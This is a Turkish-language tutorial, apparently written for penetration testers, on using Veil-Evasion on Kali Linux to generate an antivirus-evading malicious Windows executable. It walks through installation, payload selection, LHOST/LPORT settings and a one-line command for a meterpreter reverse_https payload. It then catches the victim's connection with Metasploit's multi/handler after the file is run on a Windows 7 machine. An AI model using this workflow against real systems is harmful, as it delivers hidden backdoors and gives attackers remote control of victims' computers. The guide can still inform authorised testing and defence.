AV Bypass: Veil-Framework/Veil-Evasion
AV'lerden gizlenerek hedef sistemde çalışabilen bir exe hazırlamak için
Veil adlı bir uygulama kullanılabilir. Bunun için Kali'ye Veil indirilir (yüklü değilse) ve yüklenir. Daha sonra da zararlı uygulama oluşturularak istemci makinede çalıştırılır.
Not: Diğer AV atlatma teknikleri için
bakınız.
Not: Bu yazı 2014 Nisan ayında hazırlanmıştır. Bazı ekran görüntüleri son sürüm ile uygun olmayabilir.
Veil Aracının Yüklenmesi
Veil kodu
https://github.com/Veil-Framework/Veil-Evasion adresinden indirilir.
Zip dosyasından çıkarılır.
cd Desktop
unzip Veil-Evasion-master.zip
Açılan klasörin içinde bulunan setup klasörü açılır ve içerisindeki setup.sh betiği çalıştırılır.
ls
cd Veil-Evasion-master/
ls
cd setup/
ls
./setup.sh
Not: Bu betik yerine direk olarak Veil aracı başlatılarak da yükleme yapılabilir ancak bu tavsiye edilmemektedir.
Yükleme sırasında gelebilecek uyarılar kabul edilir.
Yükleme işlemi sırasında Python'un da yüklenmesi için bir ekran otomatik olarak çıkar:
Python yüklemesi tamamlanır:
Daha sonra da Pywin32 arazının yüklenmesi için başka bir pencere açılır:
Pywin32 yüklemesi tamamlanır.
Böylece Veil yüklemesi tamamlanmış olur.
Veil Uygulamasıyla Zararlı Uygulama Oluşturma
Yükleme işlemi tamamlandıktan sonra Veil-Evasion.py betiği çalıştırılır.
Tüm payload'lar listelenir.
Toplamda 28 Payload listelenir:
İstenilen payload seçilir:
Not: Payload seçiminde payload ID' değeri kullanlabildiği gibi, payload adı da kullanılabilir.
LHOST, LPORT gibi seçenekler ayarlanır: ve payload üretilir:
set LHOST 192.168.159.99
set LPORT 443
generate
Oluşturulacak uygulamaya isim verilir. Ayrıca uygulamanın ne şekilde oluşturulacağı belirlenir.
Sonuçta uygulama elde edilerek /root/veil-output/compiled dizinine kaydolur.
Not: Seçenekler belirlenirken tek bir satırda da işlem gerçekleştirilebilir. Ancak betik programlama haricinde bu işlemin yapılmaması, seçeneklerin manuel olarak ayarlanması daha uygundur. Aksi halde, yeni eklenen Payload'lar fark edilememiş olabilir. Örnek bir kod aşağıdaki gibidir (denenmedi):
./Veil.py -l python -p AESVirtualAlloc -o ZararliUygulama --msfpayload windows/meterpreter/reverse_https --msfoptions LHOST=192.168.159.99 LPORT=443
Zararlı Uygulamanın Çalıştırılması ve Bağlantının Elde Edilmesi
Zararlı uygulama Windows 7 bir makineye atılır.
Windows 7 kullanıcısı bu uygulamayı çalıştırdığında bağlantı KALI makineye düşecektir. Bu bağlantıyı dinlemek için MSF'teki exploit/multi/handler modülü kullanılabilir Windows 7 kullanıcısı bu uygulamayı çalıştırdığında bağlantı başlar ve meterpreter oturumunda (payload seçiminde meterpreter kabuğu oluşturulması istenmişti) istenilen kod çalıştırılır:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.159.99
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j
